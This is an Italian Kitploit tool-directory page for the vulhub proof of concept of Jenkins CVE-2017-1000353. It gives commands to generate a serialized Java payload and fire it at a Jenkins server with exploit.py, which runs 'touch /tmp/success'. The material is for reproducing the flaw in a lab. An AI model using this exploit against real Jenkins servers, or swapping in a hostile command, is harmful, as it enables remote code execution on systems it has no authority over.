Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/vulhub/cve-2017-1000353
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingSviluppo Payload
GitHubvulhub/cve-2017-1000353

CVE-2017-1000353

jenkins CVE-2017-1000353 POC

Vedi Repository
57621 anno faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2017-1000353 POC

Come riprodurre la vulnerabilità Jenkins CVE-2017-1000353?

Clona questo repository, usa il payload predefinito jenkins_poc.ser con il seguente comando:

root@kitploit:~
python exploit.py http://your-ip:8080 jenkins_poc.ser

Quindi verrà eseguito touch /tmp/success.

Requisiti di versione Java

Importante: La generazione del payload dipende dalla versione di Java. È stata testata con successo con openjdk:8u292. Altre versioni di Java potrebbero non funzionare correttamente per la generazione del payload e lo sfruttamento.

Come generare il payload jenkins_poc.ser?

Scarica CVE-2017-1000353-SNAPSHOT-all.jar.

root@kitploit:~
java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"

Se stai usando Docker, puoi usare il seguente comando per garantire la compatibilità:

root@kitploit:~
docker run --rm -v $(pwd):/work -w /work openjdk:8u292 java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"

Riferimenti

https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2017-1000353

Scarica lo strumento